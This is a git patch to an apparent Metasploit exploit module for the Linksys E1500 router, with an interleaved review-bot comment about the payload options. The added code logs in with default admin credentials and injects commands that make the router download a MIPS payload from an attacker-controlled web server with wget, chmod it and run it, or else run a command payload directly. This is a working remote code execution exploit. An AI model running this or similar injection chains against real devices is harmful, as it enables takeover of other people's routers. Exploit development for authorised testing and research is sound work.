From cfeddf3f3425d468d4f6d8273b64886ede4215dd Mon Sep 17 00:00:00 2001
From: m-1-k-3
Date: Fri, 29 Mar 2013 14:43:48 +0100
Subject: [PATCH] cmd payload working, most feedback included

---
 .../linux/http/linksys_e1500_up_exec.rb | 139 +++++++++++-------
 1 file changed, 82 insertions(+), 57 deletions(-)

diff --git a/modules/exploits/linux/http/linksys_e1500_up_exec.rb b/modules/exploits/linux/http/linksys_e1500_up_exec.rb
index 9a701d3fb8..fd932ebd5a 100644
--- a/modules/exploits/linux/http/linksys_e1500_up_exec.rb
+++ b/modules/exploits/linux/http/linksys_e1500_up_exec.rb
@@ -30,15 +30,26 @@ class Metasploit3 < Msf::Exploit::Remote
         ],
       'DisclosureDate' => 'Feb 05 2013',
       'Privileged' => true,
-      'Platform' => [ 'linux' ],
-      'Arch' => ARCH_MIPSLE,
-      'Targets' => [[ 'Automatic', { }]],
-      'Payload' =>
-        {
-          'Space' => 1024,
-          'DisableNops' => true,
-        },
-      'DefaultTarget' => 0
+      #'Platform' => 'linux',
+      #'Arch' => ARCH_MIPSLE,
+      'Targets' =>
+        [
+          [ 'Unix CMD',
+            {
+              'Arch' => ARCH_CMD,
+              'Platform' => 'unix',
+              #only payload cmd/unix/generic should be possible
+            }
+          ],
+          [ 'Linux Payload',
+            {
+              'Arch' => ARCH_MIPSLE,
+              'Platform' => 'linux',
+              'DisableNops' => true,
+            }
+          ],
+        ],
+      'DefaultTarget' => 1,
     ))
     register_options(
@@ -47,12 +58,11 @@ class Metasploit3 < Msf::Exploit::Remote
         OptString.new('USERNAME', [ true, 'The username to authenticate as', 'admin' ]),
         OptString.new('PASSWORD', [ true, 'The password for the specified username', 'admin' ]),
         OptString.new('DOWNHOST', [ false, 'The host to request the MIPS payload from' ]),
-        OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)', nil ]),
+        OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]),
         OptString.new('SRVHOST', [ true, 'The local host to listen on. This must be an address on the local machine' ]),
       ], self.class)
   end
-  #MISSING - command execution payload
   def request(cmd,user,pass,uri)
     begin
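Review bot: `'DisableNops' => true` is placed directly in the Linux Payload target hash, but target-level payload options are read from a nested `'Payload' => { ... }` hash (which is where the removed module-level block kept it), so it most likely no longer takes effect; the same move dropped the `'Space' => 1024` bound without a replacement, leaving no size limit on the generated payload unless one is enforced elsewhere. Suggest `'Payload' => { 'Space' => 1024, 'DisableNops' => true }` inside the Linux Payload target instead of the bare key. The commented-out `'Platform'` and `'Arch'` lines are dead and should be deleted rather than left as comments, and the comment under the Unix CMD target would be more useful as a `'Payload' => { 'Compat' => ... }` constraint if only cmd/unix/generic is meant to be selectable. The `update_info` call these keys belong to starts before the hunk.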
@@ -91,30 +101,6 @@ class Metasploit3 < Msf::Exploit::Remote
     rhost = datastore['RHOST']
     rport = datastore['RPORT']
-    # We must regenerate the payload-> not sure if this is the right way
-    arch = "ARCH_MIPSLE"
-    plat = "linux"
-    p = exploit_regenerate_payload(plat, arch)
-    @pl = p.encoded_exe
-
-    #
-    # start our server
-    #
-    resource_uri = '/' + downfile
-    service_url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
-    print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
-    start_service({'Uri' => {
-      'Proc' => Proc.new { |cli, req|
-        on_request_uri(cli, req)
-      },
-      'Path' => resource_uri
-    }})
-
-    if (datastore['DOWNHOST'])
-      service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
-    end
-
-
     #
     # testing Login
     #
@@ -143,36 +129,75 @@ class Metasploit3 < Msf::Exploit::Remote
       return
     end
-    print_status("#{rhost}:#{rport} - Asking the Linksys device to download #{service_url}")
+    if target.name =~ /CMD/
+      cmd = payload.encoded
+      request(cmd,user,pass,uri)
+    else
+      #lets get some shells ...
 
-    #this filename is used to store the payload on the device
-    filename = rand_text_alpha_lower(8)
+      # We must regenerate the payload-> not sure if this is the right way
+      arch = "ARCH_MIPSLE"
+      plat = "linux"
+      p = exploit_regenerate_payload(plat, arch)
 
-    cmd = "/usr/bin/wget #{service_url} -O /tmp/#(unknown)"
+      @pl = p.encoded_exe
 
-    request(cmd,user,pass,uri)
+      #
+      # start our server
+      #
+      resource_uri = '/' + downfile
 
-    #
-    # chmod
-    #
+      if (datastore['DOWNHOST'])
+        service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
+      else
+        #easy way ... do not use SSL ;)
+        if datastore['SSL']
+          ssl_restore = true
+          datastore['SSL'] = false
+        end
 
-    cmd = "chmod 777 /tmp/#(unknown)"
+        service_url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
+        print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
+        start_service({'Uri' => {
+          'Proc' => Proc.new { |cli, req|
+            on_request_uri(cli, req)
+          },
+          'Path' => resource_uri
+        }})
 
-    print_status("#{rhost}:#{rport} - Asking the Linksys device to prepare #{downfile}")
+        datastore['SSL'] = true if ssl_restore
+      end
 
-    request(cmd,user,pass,uri)
+      print_status("#{rhost}:#{rport} - Asking the Linksys device to download #{service_url}")
+
+      #this filename is used to store the payload on the device
+      filename = rand_text_alpha_lower(8)
+
+      cmd = "/usr/bin/wget #{service_url} -O /tmp/#(unknown)"
+
+      request(cmd,user,pass,uri)
+
+      #
+      # chmod
+      #
+
+      cmd = "chmod 777 /tmp/#(unknown)"
+
+      print_status("#{rhost}:#{rport} - Asking the Linksys device to prepare #{downfile}")
+
+      request(cmd,user,pass,uri)
+
+      #
+      # execute
+      #
+
+      cmd = "/tmp/#(unknown)"
+
+      print_status("#{rhost}:#{rport} - Asking the Linksys device to execute #{downfile}")
+
+      request(cmd,user,pass,uri)
+    end
 
-    #
-    # execute
-    #
-
-    cmd = "/tmp/#(unknown)"
-
-    print_status("#{rhost}:#{rport} - Asking the Linksys device to execute #{downfile}")
-
-    request(cmd,user,pass,uri)
-
-
     handler
   end